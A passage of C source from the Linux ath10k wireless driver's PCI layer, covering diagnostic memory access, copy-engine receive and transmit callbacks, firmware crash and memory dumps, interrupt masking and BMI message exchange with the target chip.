__ath10k_pci_diag_read_hi(ar, dest, HI_ITEM(src), len) int ath10k_pci_diag_write_mem(struct ath10k *ar, u32 address, const void *data, int nbytes) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret = 0; u32 *buf; unsigned int completed_nbytes, alloc_nbytes, remaining_bytes; struct ath10k_ce_pipe *ce_diag; void *data_buf; dma_addr_t ce_data_base = 0; int i; mutex_lock(&ar_pci->ce_diag_mutex); ce_diag = ar_pci->ce_diag; /* * Allocate a temporary bounce buffer to hold caller's data * to be DMA'ed to Target. This guarantees * 1) 4-byte alignment * 2) Buffer in DMA-able space */ alloc_nbytes = min_t(unsigned int, nbytes, DIAG_TRANSFER_LIMIT); data_buf = dma_alloc_coherent(ar->dev, alloc_nbytes, &ce_data_base, GFP_ATOMIC); if (!data_buf) { ret = -ENOMEM; goto done; } /* * The address supplied by the caller is in the * Target CPU virtual address space. * * In order to use this address with the diagnostic CE, * convert it from * Target CPU virtual address space * to * CE address space */ address = ath10k_pci_targ_cpu_to_ce_addr(ar, address); remaining_bytes = nbytes; while (remaining_bytes) { /* FIXME: check cast */ nbytes = min_t(int, remaining_bytes, DIAG_TRANSFER_LIMIT); /* Copy caller's data to allocated DMA buf */ memcpy(data_buf, data, nbytes); /* Set up to receive directly into Target(!) address */ ret = ath10k_ce_rx_post_buf(ce_diag, &address, address); if (ret != 0) goto done; /* * Request CE to send caller-supplied data that * was copied to bounce buffer to Target(!) address. */ ret = ath10k_ce_send(ce_diag, NULL, ce_data_base, nbytes, 0, 0); if (ret != 0) goto done; i = 0; while (ath10k_ce_completed_send_next(ce_diag, NULL) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } i = 0; while (ath10k_ce_completed_recv_next(ce_diag, (void **)&buf, &completed_nbytes) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } if (nbytes != completed_nbytes) { ret = -EIO; goto done; } if (*buf != address) { ret = -EIO; goto done; } remaining_bytes -= nbytes; address += nbytes; data += nbytes; } done: if (data_buf) { dma_free_coherent(ar->dev, alloc_nbytes, data_buf, ce_data_base); } if (ret != 0) ath10k_warn(ar, "failed to write diag value at 0x%x: %d\n", address, ret); mutex_unlock(&ar_pci->ce_diag_mutex); return ret; } static int ath10k_pci_diag_write32(struct ath10k *ar, u32 address, u32 value) { __le32 val = __cpu_to_le32(value); return ath10k_pci_diag_write_mem(ar, address, &val, sizeof(val)); } /* Called by lower (CE) layer when a send to Target completes. */ static void ath10k_pci_htc_tx_cb(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct sk_buff_head list; struct sk_buff *skb; __skb_queue_head_init(&list); while (ath10k_ce_completed_send_next(ce_state, (void **)&skb) == 0) { /* no need to call tx completion for NULL pointers */ if (skb == NULL) continue; __skb_queue_tail(&list, skb); } while ((skb = __skb_dequeue(&list))) ath10k_htc_tx_completion_handler(ar, skb); } static void ath10k_pci_process_rx_cb(struct ath10k_ce_pipe *ce_state, void (*callback)(struct ath10k *ar, struct sk_buff *skb)) { struct ath10k *ar = ce_state->ar; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe_info = &ar_pci->pipe_info[ce_state->id]; struct sk_buff *skb; struct sk_buff_head list; void *transfer_context; unsigned int nbytes, max_nbytes; __skb_queue_head_init(&list); while (ath10k_ce_completed_recv_next(ce_state, &transfer_context, &nbytes) == 0) { skb = transfer_context; max_nbytes = skb->len + skb_tailroom(skb); dma_unmap_single(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, max_nbytes, DMA_FROM_DEVICE); if (unlikely(max_nbytes < nbytes)) { ath10k_warn(ar, "rxed more than expected (nbytes %d, max %d)", nbytes, max_nbytes); dev_kfree_skb_any(skb); continue; } skb_put(skb, nbytes); __skb_queue_tail(&list, skb); } while ((skb = __skb_dequeue(&list))) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci rx ce pipe %d len %d\n", ce_state->id, skb->len); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci rx: ", skb->data, skb->len); callback(ar, skb); } ath10k_pci_rx_post_pipe(pipe_info); } static void ath10k_pci_process_htt_rx_cb(struct ath10k_ce_pipe *ce_state, void (*callback)(struct ath10k *ar, struct sk_buff *skb)) { struct ath10k *ar = ce_state->ar; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe_info = &ar_pci->pipe_info[ce_state->id]; struct ath10k_ce_pipe *ce_pipe = pipe_info->ce_hdl; struct sk_buff *skb; struct sk_buff_head list; void *transfer_context; unsigned int nbytes, max_nbytes, nentries; int orig_len; /* No need to aquire ce_lock for CE5, since this is the only place CE5 * is processed other than init and deinit. Before releasing CE5 * buffers, interrupts are disabled. Thus CE5 access is serialized. */ __skb_queue_head_init(&list); while (ath10k_ce_completed_recv_next_nolock(ce_state, &transfer_context, &nbytes) == 0) { skb = transfer_context; max_nbytes = skb->len + skb_tailroom(skb); if (unlikely(max_nbytes < nbytes)) { ath10k_warn(ar, "rxed more than expected (nbytes %d, max %d)", nbytes, max_nbytes); continue; } dma_sync_single_for_cpu(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, max_nbytes, DMA_FROM_DEVICE); skb_put(skb, nbytes); __skb_queue_tail(&list, skb); } nentries = skb_queue_len(&list); while ((skb = __skb_dequeue(&list))) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci rx ce pipe %d len %d\n", ce_state->id, skb->len); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci rx: ", skb->data, skb->len); orig_len = skb->len; callback(ar, skb); skb_push(skb, orig_len - skb->len); skb_reset_tail_pointer(skb); skb_trim(skb, 0); /*let device gain the buffer again*/ dma_sync_single_for_device(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); } ath10k_ce_rx_update_write_idx(ce_pipe, nentries); } /* Called by lower (CE) layer when data is received from the Target. */ static void ath10k_pci_htc_rx_cb(struct ath10k_ce_pipe *ce_state) { ath10k_pci_process_rx_cb(ce_state, ath10k_htc_rx_completion_handler); } static void ath10k_pci_htt_htc_rx_cb(struct ath10k_ce_pipe *ce_state) { /* CE4 polling needs to be done whenever CE pipe which transports * HTT Rx (target->host) is processed. */ ath10k_ce_per_engine_service(ce_state->ar, 4); ath10k_pci_process_rx_cb(ce_state, ath10k_htc_rx_completion_handler); } /* Called by lower (CE) layer when data is received from the Target. * Only 10.4 firmware uses separate CE to transfer pktlog data. */ static void ath10k_pci_pktlog_rx_cb(struct ath10k_ce_pipe *ce_state) { ath10k_pci_process_rx_cb(ce_state, ath10k_htt_rx_pktlog_completion_handler); } /* Called by lower (CE) layer when a send to HTT Target completes. */ static void ath10k_pci_htt_tx_cb(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct sk_buff *skb; while (ath10k_ce_completed_send_next(ce_state, (void **)&skb) == 0) { /* no need to call tx completion for NULL pointers */ if (!skb) continue; dma_unmap_single(ar->dev, ATH10K_SKB_CB(skb)->paddr, skb->len, DMA_TO_DEVICE); ath10k_htt_hif_tx_complete(ar, skb); } } static void ath10k_pci_htt_rx_deliver(struct ath10k *ar, struct sk_buff *skb) { skb_pull(skb, sizeof(struct ath10k_htc_hdr)); ath10k_htt_t2h_msg_handler(ar, skb); } /* Called by lower (CE) layer when HTT data is received from the Target. */ static void ath10k_pci_htt_rx_cb(struct ath10k_ce_pipe *ce_state) { /* CE4 polling needs to be done whenever CE pipe which transports * HTT Rx (target->host) is processed. */ ath10k_ce_per_engine_service(ce_state->ar, 4); ath10k_pci_process_htt_rx_cb(ce_state, ath10k_pci_htt_rx_deliver); } int ath10k_pci_hif_tx_sg(struct ath10k *ar, u8 pipe_id, struct ath10k_hif_sg_item *items, int n_items) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_pci_pipe *pci_pipe = &ar_pci->pipe_info[pipe_id]; struct ath10k_ce_pipe *ce_pipe = pci_pipe->ce_hdl; struct ath10k_ce_ring *src_ring = ce_pipe->src_ring; unsigned int nentries_mask; unsigned int sw_index; unsigned int write_index; int err, i = 0; spin_lock_bh(&ce->ce_lock); nentries_mask = src_ring->nentries_mask; sw_index = src_ring->sw_index; write_index = src_ring->write_index; if (unlikely(CE_RING_DELTA(nentries_mask, write_index, sw_index - 1) < n_items)) { err = -ENOBUFS; goto err; } for (i = 0; i < n_items - 1; i++) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci tx item %d paddr %pad len %d n_items %d\n", i, &items[i].paddr, items[i].len, n_items); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci tx data: ", items[i].vaddr, items[i].len); err = ath10k_ce_send_nolock(ce_pipe, items[i].transfer_context, items[i].paddr, items[i].len, items[i].transfer_id, CE_SEND_FLAG_GATHER); if (err) goto err; } /* `i` is equal to `n_items -1` after for() */ ath10k_dbg(ar, ATH10K_DBG_PCI, "pci tx item %d paddr %pad len %d n_items %d\n", i, &items[i].paddr, items[i].len, n_items); ath10k_dbg_dump(ar, ATH10K_DBG_PCI_DUMP, NULL, "pci tx data: ", items[i].vaddr, items[i].len); err = ath10k_ce_send_nolock(ce_pipe, items[i].transfer_context, items[i].paddr, items[i].len, items[i].transfer_id, 0); if (err) goto err; spin_unlock_bh(&ce->ce_lock); return 0; err: for (; i > 0; i--) __ath10k_ce_send_revert(ce_pipe); spin_unlock_bh(&ce->ce_lock); return err; } int ath10k_pci_hif_diag_read(struct ath10k *ar, u32 address, void *buf, size_t buf_len) { return ath10k_pci_diag_read_mem(ar, address, buf, buf_len); } u16 ath10k_pci_hif_get_free_queue_number(struct ath10k *ar, u8 pipe) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif get free queue number\n"); return ath10k_ce_num_free_src_entries(ar_pci->pipe_info[pipe].ce_hdl); } static void ath10k_pci_dump_registers(struct ath10k *ar, struct ath10k_fw_crash_data *crash_data) { __le32 reg_dump_values[REG_DUMP_COUNT_QCA988X] = {}; int i, ret; lockdep_assert_held(&ar->dump_mutex); ret = ath10k_pci_diag_read_hi(ar, &reg_dump_values[0], hi_failure_state, REG_DUMP_COUNT_QCA988X * sizeof(__le32)); if (ret) { ath10k_err(ar, "failed to read firmware dump area: %d\n", ret); return; } BUILD_BUG_ON(REG_DUMP_COUNT_QCA988X % 4); ath10k_err(ar, "firmware register dump:\n"); for (i = 0; i < REG_DUMP_COUNT_QCA988X; i += 4) ath10k_err(ar, "[%02d]: 0x%08X 0x%08X 0x%08X 0x%08X\n", i, __le32_to_cpu(reg_dump_values[i]), __le32_to_cpu(reg_dump_values[i + 1]), __le32_to_cpu(reg_dump_values[i + 2]), __le32_to_cpu(reg_dump_values[i + 3])); if (!crash_data) return; for (i = 0; i < REG_DUMP_COUNT_QCA988X; i++) crash_data->registers[i] = reg_dump_values[i]; } static int ath10k_pci_dump_memory_section(struct ath10k *ar, const struct ath10k_mem_region *mem_region, u8 *buf, size_t buf_len) { const struct ath10k_mem_section *cur_section, *next_section; unsigned int count, section_size, skip_size; int ret, i, j; if (!mem_region || !buf) return 0; cur_section = &mem_region->section_table.sections[0]; if (mem_region->start > cur_section->start) { ath10k_warn(ar, "incorrect memdump region 0x%x with section start address 0x%x.\n", mem_region->start, cur_section->start); return 0; } skip_size = cur_section->start - mem_region->start; /* fill the gap between the first register section and register * start address */ for (i = 0; i < skip_size; i++) { *buf = ATH10K_MAGIC_NOT_COPIED; buf++; } count = 0; for (i = 0; cur_section != NULL; i++) { section_size = cur_section->end - cur_section->start; if (section_size <= 0) { ath10k_warn(ar, "incorrect ramdump format with start address 0x%x and stop address 0x%x\n", cur_section->start, cur_section->end); break; } if ((i + 1) == mem_region->section_table.size) { /* last section */ next_section = NULL; skip_size = 0; } else { next_section = cur_section + 1; if (cur_section->end > next_section->start) { ath10k_warn(ar, "next ramdump section 0x%x is smaller than current end address 0x%x\n", next_section->start, cur_section->end); break; } skip_size = next_section->start - cur_section->end; } if (buf_len < (skip_size + section_size)) { ath10k_warn(ar, "ramdump buffer is too small: %zu\n", buf_len); break; } buf_len -= skip_size + section_size; /* read section to dest memory */ ret = ath10k_pci_diag_read_mem(ar, cur_section->start, buf, section_size); if (ret) { ath10k_warn(ar, "failed to read ramdump from section 0x%x: %d\n", cur_section->start, ret); break; } buf += section_size; count += section_size; /* fill in the gap between this section and the next */ for (j = 0; j < skip_size; j++) { *buf = ATH10K_MAGIC_NOT_COPIED; buf++; } count += skip_size; if (!next_section) /* this was the last section */ break; cur_section = next_section; } return count; } static int ath10k_pci_set_ram_config(struct ath10k *ar, u32 config) { u32 val; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + FW_RAM_CONFIG_ADDRESS, config); val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + FW_RAM_CONFIG_ADDRESS); if (val != config) { ath10k_warn(ar, "failed to set RAM config from 0x%x to 0x%x\n", val, config); return -EIO; } return 0; } /* if an error happened returns < 0, otherwise the length */ static int ath10k_pci_dump_memory_sram(struct ath10k *ar, const struct ath10k_mem_region *region, u8 *buf) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); u32 base_addr, i; base_addr = ioread32(ar_pci->mem + QCA99X0_PCIE_BAR0_START_REG); base_addr += region->start; for (i = 0; i < region->len; i += 4) { iowrite32(base_addr + i, ar_pci->mem + QCA99X0_CPU_MEM_ADDR_REG); *(u32 *)(buf + i) = ioread32(ar_pci->mem + QCA99X0_CPU_MEM_DATA_REG); } return region->len; } /* if an error happened returns < 0, otherwise the length */ static int ath10k_pci_dump_memory_reg(struct ath10k *ar, const struct ath10k_mem_region *region, u8 *buf) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); u32 i; for (i = 0; i < region->len; i += 4) *(u32 *)(buf + i) = ioread32(ar_pci->mem + region->start + i); return region->len; } /* if an error happened returns < 0, otherwise the length */ static int ath10k_pci_dump_memory_generic(struct ath10k *ar, const struct ath10k_mem_region *current_region, u8 *buf) { int ret; if (current_region->section_table.size > 0) /* Copy each section individually. */ return ath10k_pci_dump_memory_section(ar, current_region, buf, current_region->len); /* No individiual memory sections defined so we can * copy the entire memory region. */ ret = ath10k_pci_diag_read_mem(ar, current_region->start, buf, current_region->len); if (ret) { ath10k_warn(ar, "failed to copy ramdump region %s: %d\n", current_region->name, ret); return ret; } return current_region->len; } static void ath10k_pci_dump_memory(struct ath10k *ar, struct ath10k_fw_crash_data *crash_data) { const struct ath10k_hw_mem_layout *mem_layout; const struct ath10k_mem_region *current_region; struct ath10k_dump_ram_data_hdr *hdr; u32 count, shift; size_t buf_len; int ret, i; u8 *buf; lockdep_assert_held(&ar->dump_mutex); if (!crash_data) return; mem_layout = ath10k_coredump_get_mem_layout(ar); if (!mem_layout) return; current_region = &mem_layout->region_table.regions[0]; buf = crash_data->ramdump_buf; buf_len = crash_data->ramdump_buf_len; memset(buf, 0, buf_len); for (i = 0; i < mem_layout->region_table.size; i++) { count = 0; if (current_region->len > buf_len) { ath10k_warn(ar, "memory region %s size %d is larger that remaining ramdump buffer size %zu\n", current_region->name, current_region->len, buf_len); break; } /* To get IRAM dump, the host driver needs to switch target * ram config from DRAM to IRAM. */ if (current_region->type == ATH10K_MEM_REGION_TYPE_IRAM1 || current_region->type == ATH10K_MEM_REGION_TYPE_IRAM2) { shift = current_region->start >> 20; ret = ath10k_pci_set_ram_config(ar, shift); if (ret) { ath10k_warn(ar, "failed to switch ram config to IRAM for section %s: %d\n", current_region->name, ret); break; } } /* Reserve space for the header. */ hdr = (void *)buf; buf += sizeof(*hdr); buf_len -= sizeof(*hdr); switch (current_region->type) { case ATH10K_MEM_REGION_TYPE_IOSRAM: count = ath10k_pci_dump_memory_sram(ar, current_region, buf); break; case ATH10K_MEM_REGION_TYPE_IOREG: count = ath10k_pci_dump_memory_reg(ar, current_region, buf); break; default: ret = ath10k_pci_dump_memory_generic(ar, current_region, buf); if (ret < 0) break; count = ret; break; } hdr->region_type = cpu_to_le32(current_region->type); hdr->start = cpu_to_le32(current_region->start); hdr->length = cpu_to_le32(count); if (count == 0) /* Note: the header remains, just with zero length. */ break; buf += count; buf_len -= count; current_region++; } } static void ath10k_pci_fw_dump_work(struct work_struct *work) { struct ath10k_pci *ar_pci = container_of(work, struct ath10k_pci, dump_work); struct ath10k_fw_crash_data *crash_data; struct ath10k *ar = ar_pci->ar; char guid[UUID_STRING_LEN + 1]; mutex_lock(&ar->dump_mutex); spin_lock_bh(&ar->data_lock); ar->stats.fw_crash_counter++; spin_unlock_bh(&ar->data_lock); crash_data = ath10k_coredump_new(ar); if (crash_data) scnprintf(guid, sizeof(guid), "%pUl", &crash_data->guid); else scnprintf(guid, sizeof(guid), "n/a"); ath10k_err(ar, "firmware crashed! (guid %s)\n", guid); ath10k_print_driver_info(ar); ath10k_pci_dump_registers(ar, crash_data); ath10k_ce_dump_registers(ar, crash_data); ath10k_pci_dump_memory(ar, crash_data); mutex_unlock(&ar->dump_mutex); queue_work(ar->workqueue, &ar->restart_work); } static void ath10k_pci_fw_crashed_dump(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); queue_work(ar->workqueue, &ar_pci->dump_work); } void ath10k_pci_hif_send_complete_check(struct ath10k *ar, u8 pipe, int force) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif send complete check\n"); if (!force) { int resources; /* * Decide whether to actually poll for completions, or just * wait for a later chance. * If there seem to be plenty of resources left, then just wait * since checking involves reading a CE register, which is a * relatively expensive operation. */ resources = ath10k_pci_hif_get_free_queue_number(ar, pipe); /* * If at least 50% of the total resources are still available, * don't bother checking again yet. */ if (resources > (host_ce_config_wlan[pipe].src_nentries >> 1)) return; } ath10k_ce_per_engine_service(ar, pipe); } static void ath10k_pci_rx_retry_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); del_timer_sync(&ar_pci->rx_post_retry); } int ath10k_pci_hif_map_service_to_pipe(struct ath10k *ar, u16 service_id, u8 *ul_pipe, u8 *dl_pipe) { const struct service_to_pipe *entry; bool ul_set = false, dl_set = false; int i; ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif map service\n"); for (i = 0; i < ARRAY_SIZE(target_service_to_ce_map_wlan); i++) { entry = &target_service_to_ce_map_wlan[i]; if (__le32_to_cpu(entry->service_id) != service_id) continue; switch (__le32_to_cpu(entry->pipedir)) { case PIPEDIR_NONE: break; case PIPEDIR_IN: WARN_ON(dl_set); *dl_pipe = __le32_to_cpu(entry->pipenum); dl_set = true; break; case PIPEDIR_OUT: WARN_ON(ul_set); *ul_pipe = __le32_to_cpu(entry->pipenum); ul_set = true; break; case PIPEDIR_INOUT: WARN_ON(dl_set); WARN_ON(ul_set); *dl_pipe = __le32_to_cpu(entry->pipenum); *ul_pipe = __le32_to_cpu(entry->pipenum); dl_set = true; ul_set = true; break; } } if (!ul_set || !dl_set) return -ENOENT; return 0; } void ath10k_pci_hif_get_default_pipe(struct ath10k *ar, u8 *ul_pipe, u8 *dl_pipe) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif get default pipe\n"); (void)ath10k_pci_hif_map_service_to_pipe(ar, ATH10K_HTC_SVC_ID_RSVD_CTRL, ul_pipe, dl_pipe); } void ath10k_pci_irq_msi_fw_mask(struct ath10k *ar) { u32 val; switch (ar->hw_rev) { case ATH10K_HW_QCA988X: case ATH10K_HW_QCA9887: case ATH10K_HW_QCA6174: case ATH10K_HW_QCA9377: val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS); val &= ~CORE_CTRL_PCIE_REG_31_MASK; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS, val); break; case ATH10K_HW_QCA99X0: case ATH10K_HW_QCA9984: case ATH10K_HW_QCA9888: case ATH10K_HW_QCA4019: /* TODO: Find appropriate register configuration for QCA99X0 * to mask irq/MSI. */ break; case ATH10K_HW_WCN3990: break; } } static void ath10k_pci_irq_msi_fw_unmask(struct ath10k *ar) { u32 val; switch (ar->hw_rev) { case ATH10K_HW_QCA988X: case ATH10K_HW_QCA9887: case ATH10K_HW_QCA6174: case ATH10K_HW_QCA9377: val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS); val |= CORE_CTRL_PCIE_REG_31_MASK; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS, val); break; case ATH10K_HW_QCA99X0: case ATH10K_HW_QCA9984: case ATH10K_HW_QCA9888: case ATH10K_HW_QCA4019: /* TODO: Find appropriate register configuration for QCA99X0 * to unmask irq/MSI. */ break; case ATH10K_HW_WCN3990: break; } } static void ath10k_pci_irq_disable(struct ath10k *ar) { ath10k_ce_disable_interrupts(ar); ath10k_pci_disable_and_clear_legacy_irq(ar); ath10k_pci_irq_msi_fw_mask(ar); } static void ath10k_pci_irq_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); synchronize_irq(ar_pci->pdev->irq); } static void ath10k_pci_irq_enable(struct ath10k *ar) { ath10k_ce_enable_interrupts(ar); ath10k_pci_enable_legacy_irq(ar); ath10k_pci_irq_msi_fw_unmask(ar); } static int ath10k_pci_hif_start(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif start\n"); napi_enable(&ar->napi); ath10k_pci_irq_enable(ar); ath10k_pci_rx_post(ar); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, ar_pci->link_ctl); return 0; } static void ath10k_pci_rx_pipe_cleanup(struct ath10k_pci_pipe *pci_pipe) { struct ath10k *ar; struct ath10k_ce_pipe *ce_pipe; struct ath10k_ce_ring *ce_ring; struct sk_buff *skb; int i; ar = pci_pipe->hif_ce_state; ce_pipe = pci_pipe->ce_hdl; ce_ring = ce_pipe->dest_ring; if (!ce_ring) return; if (!pci_pipe->buf_sz) return; for (i = 0; i < ce_ring->nentries; i++) { skb = ce_ring->per_transfer_context[i]; if (!skb) continue; ce_ring->per_transfer_context[i] = NULL; dma_unmap_single(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); dev_kfree_skb_any(skb); } } static void ath10k_pci_tx_pipe_cleanup(struct ath10k_pci_pipe *pci_pipe) { struct ath10k *ar; struct ath10k_ce_pipe *ce_pipe; struct ath10k_ce_ring *ce_ring; struct sk_buff *skb; int i; ar = pci_pipe->hif_ce_state; ce_pipe = pci_pipe->ce_hdl; ce_ring = ce_pipe->src_ring; if (!ce_ring) return; if (!pci_pipe->buf_sz) return; for (i = 0; i < ce_ring->nentries; i++) { skb = ce_ring->per_transfer_context[i]; if (!skb) continue; ce_ring->per_transfer_context[i] = NULL; ath10k_htc_tx_completion_handler(ar, skb); } } /* * Cleanup residual buffers for device shutdown: * buffers that were enqueued for receive * buffers that were to be sent * Note: Buffers that had completed but which were * not yet processed are on a completion queue. They * are handled when the completion thread shuts down. */ static void ath10k_pci_buffer_cleanup(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int pipe_num; for (pipe_num = 0; pipe_num < CE_COUNT; pipe_num++) { struct ath10k_pci_pipe *pipe_info; pipe_info = &ar_pci->pipe_info[pipe_num]; ath10k_pci_rx_pipe_cleanup(pipe_info); ath10k_pci_tx_pipe_cleanup(pipe_info); } } void ath10k_pci_ce_deinit(struct ath10k *ar) { int i; for (i = 0; i < CE_COUNT; i++) ath10k_ce_deinit_pipe(ar, i); } void ath10k_pci_flush(struct ath10k *ar) { ath10k_pci_rx_retry_sync(ar); ath10k_pci_buffer_cleanup(ar); } static void ath10k_pci_hif_stop(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif stop\n"); ath10k_pci_irq_disable(ar); ath10k_pci_irq_sync(ar); napi_synchronize(&ar->napi); napi_disable(&ar->napi); /* Most likely the device has HTT Rx ring configured. The only way to * prevent the device from accessing (and possible corrupting) host * memory is to reset the chip now. * * There's also no known way of masking MSI interrupts on the device. * For ranged MSI the CE-related interrupts can be masked. However * regardless how many MSI interrupts are assigned the first one * is always used for firmware indications (crashes) and cannot be * masked. To prevent the device from asserting the interrupt reset it * before proceeding with cleanup. */ ath10k_pci_safe_chip_reset(ar); ath10k_pci_flush(ar); spin_lock_irqsave(&ar_pci->ps_lock, flags); WARN_ON(ar_pci->ps_wake_refcount > 0); spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } int ath10k_pci_hif_exchange_bmi_msg(struct ath10k *ar, void *req, u32 req_len, void *resp, u32 *resp_len) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pci_tx = &ar_pci->pipe_info[BMI_CE_NUM_TO_TARG]; struct ath10k_pci_pipe *pci_rx = &ar_pci->pipe_info[BMI_CE_NUM_TO_HOST]; struct ath10k_ce_pipe *ce_tx = pci_tx->ce_hdl; struct ath10k_ce_pipe *ce_rx = pci_rx->ce_hdl; dma_addr_t req_paddr = 0; dma_addr_t resp_paddr = 0; struct bmi_xfer xfer = {}; void *treq, *tresp = NULL; int ret = 0; might_sleep(); if (resp && !resp_len) return -EINVAL; if (resp && resp_len && *resp_len == 0) return -EINVAL; treq = kmemdup(req, req_len, GFP_KERNEL); if (!treq) return -ENOMEM; req_paddr = dma_map_single(ar->dev, treq, req_len, DMA_TO_DEVICE); ret = dma_mapping_error(ar->dev, req_paddr); if (ret) { ret = -EIO; goto err_dma; } if (resp && resp_len) { tresp = kzalloc(*resp_len, GFP_KERNEL); if (!tresp) { ret = -ENOMEM; goto err_req; } resp_paddr = dma_map_single(ar->dev, tresp, *resp_len, DMA_FROM_DEVICE); ret = dma_mapping_error(ar->dev, resp_paddr); if (ret) { ret = -EIO; goto err_req; } xfer.wait_for_resp = true; xfer.resp_len = 0; ath10k_ce_rx_post_buf(ce_rx, &xfer, resp_paddr); } ret = ath10k_ce_send(ce_tx, &xfer, req_paddr, req_len, -1, 0); if (ret) goto err_resp; ret = ath10k_pci_bmi_wait(ar, ce_tx, ce_rx, &xfer); if (ret) { dma_addr_t unused_buffer; unsigned int unused_nbytes; unsigned int unused_id; ath10k_ce_cancel_send_next(ce_tx, NULL, &unused_buffer, &unused_nbytes, &unused_id); } else { /* non-zero means we did not time out */ ret = 0; } err_resp: if (resp) { dma_addr_t unused_buffer; ath10k_ce_revoke_recv_next(ce_rx, NULL, &unused_buffer); dma_unmap_single(ar->dev, resp_paddr, *resp_len, DMA_FROM_DEVICE); } err_req: dma_unmap_single(ar->dev, req_paddr, req_len, DMA_TO_DEVICE); if (ret == 0 && resp_len) { *resp_len = min(*resp_len, xfer.resp_len); memcpy(resp, tresp, xfer.resp_len); } err_dma: kfree(treq); kfree(tresp); return ret; } static void ath10k_pci_bmi_send_done(struct ath10k_ce_pipe *ce_state) { struct bmi_xfer *xfer; if (ath10k_ce_completed_send_next(ce_state, (void **)&xfer)) return; xfer->tx_done = true; } static void ath10k_pci_bmi_recv_data(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct bmi_xfer *xfer; unsigned int nbytes; if (ath10k_ce_completed_recv_next(ce_state, (void **)&xfer, &nbytes)) return; if (WARN_ON_ONCE(!xfer)) return; if (!xfer->wait_for_resp) { ath10k_warn(ar, "unexpected: BMI data received; ignoring\n"); return; } xfer->resp_len = nbytes; xfer->rx_done = true; } static int ath10k_pci_bmi_wait(struct ath10k *ar, struct ath10k_ce_pipe *tx_pipe, struct ath10k_ce_pipe *rx_pipe, struct bmi_xfer *xfer) { unsigned long timeout = jiffies + BMI_COMMUNICATION_TIMEOUT_HZ; unsigned long started = jiffies; unsigned long dur; int ret; while (time_before_eq(jiffies, timeout)) { ath10k_pci_bmi_send_done(tx_pipe); ath10k_pci_bmi_recv_data(rx_pipe); if (xfer->tx_done && (xfer->rx_done == xfer->wait_for_resp)) { ret = 0; goto out; } schedule(); } ret = -ETIMEDOUT; out: dur = jiffies - started; if (dur > HZ) ath10k_dbg(ar, ATH10K_DBG_BMI, "bmi cmd took %lu jiffies hz %d ret %d\n", dur, HZ, ret); return ret; } /* * Send an interrupt to the device to wake up the Target CPU * so it has an opportunity to notice any changed state. */ static int ath10k_pci_wake_target_cpu(struct ath10k *ar) { u32 addr, val; addr = SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS; val = ath10k_pci_read32(ar, addr); val |= CORE_CTRL_CPU_INTR_MASK; ath10k_pci_write32(ar, addr, val); return 0; } static int ath10k_pci_get_num_banks(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->pdev->device) { case QCA988X_2_0_DEVICE_ID_UBNT: case QCA988X_2_0_DEVICE_ID: case QCA99X0_2_0_DEVICE_ID: case QCA9888_2_0_DEVICE_ID: case QCA9984_1_0_DEVICE_ID: case QCA9887_1_0_DEVICE_ID: return 1; case QCA6164_2_1_DEVICE_ID: case QCA6174_2_1_DEVICE_ID: switch (MS(ar->bus_param.chip_id, SOC_CHIP_ID_REV)) { case 